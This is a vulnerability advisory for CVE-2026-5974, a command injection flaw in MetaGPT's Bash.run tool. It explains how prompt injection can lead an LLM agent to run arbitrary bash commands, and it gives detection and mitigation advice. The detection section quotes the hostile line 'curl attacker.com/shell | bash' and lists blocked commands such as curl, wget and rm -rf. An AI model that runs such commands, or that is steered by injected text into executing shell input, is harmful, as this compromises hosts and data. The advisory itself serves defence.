CVE-2026-5974
Remote OS Command Injection in FoundationAgents MetaGPT Bash.run Function
Publication date: 2026-04-09
Last updated on: 2026-04-29
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| deepwisdom | metagpt | to 0.8.1 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-77 | The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. |
| CWE-78 | The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-5974 is a critical remote code execution vulnerability in the MetaGPT project, specifically in the Bash.run() method of the Bash class located in metagpt/tools/libs/terminal.py.
This method executes bash commands asynchronously by writing them directly to a persistent bash process without proper input validation or security restrictions.
Because the Bash.run() method is exposed to large language model (LLM) agents, an attacker can exploit prompt injection attacks to cause the LLM to run arbitrary and potentially malicious bash commands on the host system.
This vulnerability allows attackers to execute arbitrary commands remotely, leading to full system compromise.
How can this vulnerability impact me? :
The vulnerability allows an attacker to remotely execute arbitrary bash commands on the affected system.
- Full system compromise, including unauthorized access and control.
- Data exfiltration by reading or copying sensitive information.
- Lateral movement within the network to compromise other systems.
- Persistence through installation of backdoors or malicious scripts.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability involves remote command injection via the Bash.run() method in the MetaGPT project, which allows execution of arbitrary bash commands without security restrictions.
Detection can focus on monitoring for suspicious or unexpected bash commands being executed, especially those involving command injection patterns such as use of shell metacharacters, command substitution, or dangerous commands like curl, wget, rm -rf, or sudo.
Suggested detection commands include monitoring process activity and command execution logs for unusual commands or patterns. For example:
- Use auditd or similar Linux auditing tools to track execution of bash commands: `auditctl -w /bin/bash -p x -k bash_exec`
- Check for suspicious files created by injected commands, e.g., `ls -l /tmp/bash_tool_rce_proof.txt` as seen in the proof-of-concept.
- Monitor network connections for unexpected outbound requests that could indicate command injection attempts, e.g., `netstat -tunp` or `ss -tunp`.
- Search logs or command history for suspicious commands like `curl attacker.com/shell | bash`.
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include removing or disabling the vulnerable Bash.run() method exposure to LLM agents to prevent arbitrary command execution.
Implement strict input validation and allowlists for permitted commands to block dangerous commands and shell metacharacters.
Use sandboxed or containerized environments (e.g., Docker, nsjail) to isolate command execution and limit potential damage.
Require human approval before executing any shell commands generated by LLMs.
Apply patches or updates once available that introduce safe command allowlists and validation, as described in the security fix which blocks commands like curl, wget, rm -rf, sudo, and shell metacharacters.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability in FoundationAgents MetaGPT allows remote code execution through command injection, which can lead to full system compromise, data exfiltration, lateral movement, and persistence through backdoors.
Such impacts can negatively affect compliance with common standards and regulations like GDPR and HIPAA, which require protection of sensitive data and systems against unauthorized access and breaches.
Specifically, unauthorized remote code execution and potential data exfiltration violate principles of data confidentiality, integrity, and availability mandated by these regulations.
Therefore, exploitation of this vulnerability could lead to non-compliance with these standards, resulting in legal and financial consequences.